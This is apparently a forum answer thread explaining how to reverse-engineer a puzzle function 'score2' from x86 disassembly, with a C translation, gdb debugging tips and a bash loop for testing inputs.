0x080488e4 <score2+28>: and $0xa,%eax ; eax = eax & 0xa
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret ; Return eax
So that means there is some kind of global variable stored at 0x8049f88
(let's call it x), and score2 literally translates to:
int score2(int n) {
x -= 2;
if (n != x)
n = 1;
else
n = 0;
n--;
n = n & 0xa;
return n;
}
EDIT: Brendan's example is the same, but probably looks more like the original code. Look over it a few times and compare it to the assembly output.
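Reading the disassembly instruction by instruction, the logic can be sketched as follows. This is an illustration under assumptions, not the original source: score2_sketch is a made-up name, and the starting value of secret is hypothetical because the real contents of 0x8049f88 are not shown in the question.

```c
/* Hypothetical stand-in for the global at 0x8049f88 (gdb labels it <secret>);
 * the starting value 100 is invented for this sketch. */
static int secret = 100;

int score2_sketch(int n)
{
    secret -= 2;                     /* mov 0x8049f88,%eax / sub $0x2 / mov back */
    int not_equal = (n != secret);   /* cmp, setne, movzbl: 1 if different, else 0 */
    return (not_equal - 1) & 0xa;    /* sub $0x1, and $0xa: 0xa on a match, else 0 */
}
```

So the function returns 10 only when the argument equals the global after it has been decremented by 2, and 0 otherwise. With the invented starting value, score2_sketch(98) returns 10 on the first call.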
The next step is now to see what's in the variable at 0x8049f88. Try running awatch *(int *)0x8049f88 inside of gdb to make it stop on every access and also print *(int *)0x8049f88 to see what's stored there.
You should also run set disassembly-flavor intel if you're not too familiar with assembly language. The syntax will then match the examples you're more likely to find on the Internet.
I presume you don't have access to the source code of the functions, and for the puzzle or homework you are supposed to try to find numbers to get a big score. You probably should edit your question to display contents of score.h, or just the relevant portions if it's quite lengthy. Also, note that disassembly at 0x8049f88 doesn't make sense. Instead use gdb's x command to display that location, and edit accordingly.
While you can attack the problem via disassembly (as above) you can also try using a different main program, that reports the results of individual score?() calls, and that loops some of them through a series of values looking for big values.
With score2(), looping within main() won't work, because score2() subtracts 2 from a word in memory on every call. So, if you wanted to try out a lot of inputs, you'd need to call the program with different arguments in a shell loop. E.g., if you are using bash:
for i in {1..1000}; do testScore2 $i; done
where testScore2 is a main program that only runs score2() with its parameter and reports the result.
Of course, because score2() can produce only two different results, as explained in detail in two previous answers, it won't actually make sense to test score2() with more than two argument values. I showed the shell code above because you might want to use such a technique with some of the other score functions.